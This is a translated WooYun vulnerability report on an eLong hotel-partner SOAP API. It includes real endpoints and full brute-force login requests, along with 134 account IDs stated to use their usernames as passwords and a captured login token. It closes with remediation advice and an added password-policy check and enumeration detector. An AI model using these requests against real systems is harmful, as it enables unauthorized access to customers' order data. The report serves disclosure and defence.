Vulnerability Summary (followers: 24)

Defect ID: wooyun-2016-0169510

Title: A VIP interface of eLong (艺龙旅行网) can leak sensitive order information

Vendor: eLong (艺龙旅行网)

Author: 艺术家

Submitted: 2016-01-13 08:57

Fixed: 2016-02-27 11:49

Published: 2016-02-27 11:49

Type: Disclosure of important sensitive information

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability Details

Disclosure timeline:

2016-01-13: Details sent to the vendor, awaiting vendor handling
2016-01-13: Vendor confirmed; details visible to the vendor only
2016-01-23: Details disclosed to core white hats and domain experts
2016-02-02: Details disclosed to regular white hats
2016-02-12: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public

Summary:

Zhuna.com (住哪网) uses this interface as well. What leaks is the interface used to integrate with other hotels, i.e. to fetch order information from them.
With this information, one can write a script that calls this interface and retrieves all of Qunar's (去哪儿) orders at other hotels.

Detailed description:

Two endpoints:
http://114-svc.elong.com/NorthBoundService/V1.1/NorthBoundAPIService.asmx?WSDL
http://hotelwsqq.vip.elong.com/NorthBoundService/V1.1/NorthBoundAPIService.asmx?WSDL
Both endpoints are identical.

[Figure: 2.jpg]

[Figure: 1.jpg]


The Login operation can be used to brute-force enumerate users.
LoginToken is the value returned after a successful login.

Proof of vulnerability:

First, brute-force the passwords:

POST /NorthBoundService/V1.1/NorthBoundAPIService.asmx HTTP/1.1
Content-Type: text/xml
SOAPAction: "http://elong.com/NorthBoundAPI/Login"
Content-Length: 1027
Host: 114-svc.elong.com
Connection: Close
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://elong.com/NorthBoundAPI/" xmlns:urn2="http://microsoft.com/wsdl/types/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:Login>
<urn:loginRequest>
<urn:UserName>XXXXX</urn:UserName>
<urn:Password>XXXXX</urn:Password>
<urn:RequestHead>
<urn:LoginToken>${alpharand}</urn:LoginToken>
<urn:Language>english</urn:Language>
<urn:GUID>1</urn:GUID>
<urn:Version>1</urn:Version>
<urn:TestMode>1</urn:TestMode>
</urn:RequestHead>
</urn:loginRequest>
</urn:Login>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


134 customer accounts were found:

AP0000706
AP0001365
AP0002195
AP0003407
AP0005525
AP0005531
AP0008530
AP0009880
AP0016839
AP0019473
AP0001230
AP0001295
AP0001698
AP0014949
AP0018909
AP0020211
AP0012332
AP0012985
AP0014972
AP0014989
AP0017261
AP0018009
AP0019080
AP0019433
AP0019589
AP0019892
AP0021191
AP0017460
AP0009323
AP0016114
AP0019099
AP0019288
AP0019684
AP0019817
AP0019832
AP0020212
AP0020609
AP0021162
AP0021699
AP0000286
AP0000434
AP0000937
AP0001082
AP0001431
AP0001650
AP0001832
AP0001929
AP0006643
AP0006825
AP0007227
AP0008944
AP0008964
AP0009103
AP0010643
AP0010723
AP0011126
AP0011613
AP0011810
AP0011893
AP0012159
AP0012165
AP0012266
AP0012268
AP0012458
AP0012549
AP0012770
AP0012800
AP0013043
AP0013909
AP0014011
AP0014978
AP0015038
AP0015115
AP0015142
AP0015318
AP0015425
AP0015427
AP0015886
AP0015945
AP0015968
AP0015982
AP0016349
AP0016829
AP0017081
AP0017143
AP0017161
AP0017333
AP0017420
AP0017426
AP0017455
AP0018743
AP0018829
AP0018859
AP0018955
AP0018956
AP0018958
AP0019024
AP0019083
AP0019374
AP0019390
AP0019423
AP0019440
AP0019532
AP0019533
AP0019555
AP0019586
AP0019597
AP0019610
AP0019632
AP0019704
AP0019726
AP0019806
AP0019894
AP0020030
AP0020044
AP0020066
AP0020100
AP0020102
AP0020146
AP0020159
AP0020332
AP0020365
AP0020610
AP0021032
AP0021051
AP0021111
AP0021157
AP0021165
AP0021689
AP0021696
AP0021790
AP0021835


The username and password are identical.
The LOGINTOKEN value is returned.

[Figure: 3.jpg]


With the LOGINTOKEN value, one can send requests impersonating an eLong agent user and retrieve all orders from other hotels.
Construct the SOAP request:

POST /NorthBoundService/V1.1/NorthBoundAPIService.asmx HTTP/1.1
Content-Type: text/xml
SOAPAction: "http://elong.com/NorthBoundAPI/GetSupportCreditCardList"
Content-Length: 970
Host: hotelwsqq.vip.elong.com
Connection: Close
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://elong.com/NorthBoundAPI/" xmlns:urn2="http://microsoft.com/wsdl/types/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:GetSupportCreditCardList>
<urn:request>
<urn:RequestHead>
<urn:LoginToken>bbb4b133-0a9f-427f-873b-53c47093f569</urn:LoginToken>
<urn:Language>CN</urn:Language>
<urn:GUID>1</urn:GUID>
<urn:Version>1</urn:Version>
<urn:TestMode>1</urn:TestMode>
</urn:RequestHead>
</urn:request>
</urn:GetSupportCreditCardList>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


The response returned:

[Figure: 4.jpg]


Here urn:GetHotelList lists the situation for a date range.
The date format is 2014-01-01.
The HotelId format is 8 digits, e.g. 00101561, 10101399, 40101844.

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://elong.com/NorthBoundAPI/" xmlns:urn2="http://microsoft.com/wsdl/types/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:GetHotelList>
<urn:GetHotelListRequest>
<urn:GetHotelCondition>
<urn:CheckInDate>01/01/1967</urn:CheckInDate>
<urn:CheckOutDate>01/01/1967</urn:CheckOutDate>
<urn:CityId>San Francisco</urn:CityId>
<urn:HotelName>${alpharand}</urn:HotelName>
<urn:HotelId>555-666-0606</urn:HotelId>
<urn:RoomTypeID>1</urn:RoomTypeID>
<urn:RatePlanID>1</urn:RatePlanID>
<urn:StarCode>94102</urn:StarCode>
<urn:HighestRate>1</urn:HighestRate>
<urn:LowestRate>1</urn:LowestRate>
<urn:PositionModeCode>94102</urn:PositionModeCode>
<urn:StartLongitude>1</urn:StartLongitude>
<urn:StartLatitude>1</urn:StartLatitude>
<urn:EndLongitude>1</urn:EndLongitude>
<urn:EndLatitude>1</urn:EndLatitude>
<urn:Radius>1</urn:Radius>
<urn:DistrictId>1</urn:DistrictId>
<urn:CommercialLocationId>1</urn:CommercialLocationId>
<urn:LandmarkLocationID>USA</urn:LandmarkLocationID>
<urn:OpeningDate>01/01/1967</urn:OpeningDate>
<urn:DecorationDate>01/01/1967</urn:DecorationDate>
<urn:RoomAmount>1</urn:RoomAmount>
<urn:OrderByCode>94102</urn:OrderByCode>
<urn:OrderTypeCode>94102</urn:OrderTypeCode>
<urn:PageIndex>20</urn:PageIndex>
<urn:MaxRows>1</urn:MaxRows>
<urn:CurrencyCode>USD</urn:CurrencyCode>
</urn:GetHotelCondition>
<urn:RequestHead>
<urn:LoginToken>${alpharand}</urn:LoginToken>
<urn:Language>english</urn:Language>
<urn:GUID>1</urn:GUID>
<urn:Version>1</urn:Version>
<urn:TestMode>1</urn:TestMode>
</urn:RequestHead>
</urn:GetHotelListRequest>
</urn:GetHotelList>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


Remediation:

Change the passwords of the API access accounts; Zhuna.com has already changed its passwords.
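The root cause reported above is an API account whose password equals its username, and the symptom is one client walking through many usernames on the Login operation. The following is an added example, not code from the report or from eLong: a credential-policy check that rejects such passwords, and a detector that flags a source IP trying many distinct usernames on the Login SOAPAction within a short window. The log format, field names and sample lines are constructed for this example; only the SOAPAction value comes from the report.

```python
"""Added example (not from the original WooYun report or from eLong's code).

(1) is_weak_api_password: rejects API passwords equal to, or trivially
    derived from, the account name (the weakness that made the
    enumeration in the report succeed).
(2) detect_login_enumeration: flags a source IP that sends Login calls for
    many distinct usernames inside a sliding time window.

The log line format below is an assumption: one line per SOAP call written
by a reverse proxy or the .asmx application, carrying the timestamp, client
IP, SOAPAction, username and outcome.
"""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) soapaction="(?P<action>[^"]+)" '
    r'user="(?P<user>[^"]*)" status=(?P<status>\w+)$'
)

# SOAPAction of the Login operation, as seen in the report's request.
LOGIN_ACTION = "http://elong.com/NorthBoundAPI/Login"


def is_weak_api_password(username: str, password: str) -> bool:
    """True when the password should be rejected by policy.

    The 12-character minimum is an assumed policy value; the rest targets
    password == username and its obvious variants (case change, reversal,
    a short prefix/suffix added to the username)."""
    u, p = username.strip().lower(), password.strip().lower()
    if len(p) < 12:
        return True
    if p == u or p == u[::-1]:
        return True
    if p.startswith(u) and len(p) - len(u) <= 4:
        return True
    if p.endswith(u) and len(p) - len(u) <= 4:
        return True
    return False


def parse_line(line: str):
    """Parse one constructed log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def detect_login_enumeration(lines, window_seconds=60, max_distinct_users=10):
    """Return {ip: peak_distinct_usernames} for every IP that tried more than
    max_distinct_users different usernames on Login within window_seconds."""
    attempts = defaultdict(list)  # ip -> [(timestamp, username)]
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["action"] != LOGIN_ACTION:
            continue
        attempts[rec["ip"]].append((rec["ts"], rec["user"]))

    flagged = {}
    for ip, events in attempts.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # advance the window start until the window fits in window_seconds
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            distinct = len({user for _, user in events[start:end + 1]})
            if distinct > max_distinct_users:
                flagged[ip] = max(flagged.get(ip, 0), distinct)
    return flagged


# Constructed sample log: one IP cycling through 12 usernames in 12 seconds,
# and one partner account doing a normal login followed by a hotel query.
SAMPLE_LOG = [
    f'2016-01-12T23:00:{i:02d} 198.51.100.7 soapaction="{LOGIN_ACTION}" '
    f'user="AP{i:07d}" status=fail'
    for i in range(12)
] + [
    f'2016-01-12T23:00:05 203.0.113.9 soapaction="{LOGIN_ACTION}" '
    f'user="partner01" status=ok',
    '2016-01-12T23:00:06 203.0.113.9 '
    'soapaction="http://elong.com/NorthBoundAPI/GetHotelList" '
    'user="partner01" status=ok',
]

if __name__ == "__main__":
    print("weak AP0000706/AP0000706:", is_weak_api_password("AP0000706", "AP0000706"))
    print("flagged IPs:", detect_login_enumeration(SAMPLE_LOG))
```

The window detector is deliberately keyed on distinct usernames rather than on failed logins alone, because the report shows the enumeration succeeding on the first try for accounts whose password equals the username: a threshold on failures would miss exactly those hits.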

Copyright notice: please credit 艺术家@乌云 when reposting


Vendor Response

Vendor response:

Severity: Low

Rank: 5

Confirmed: 2016-01-13 16:16

Vendor reply:

Thanks to the white hat!

Latest status:

None

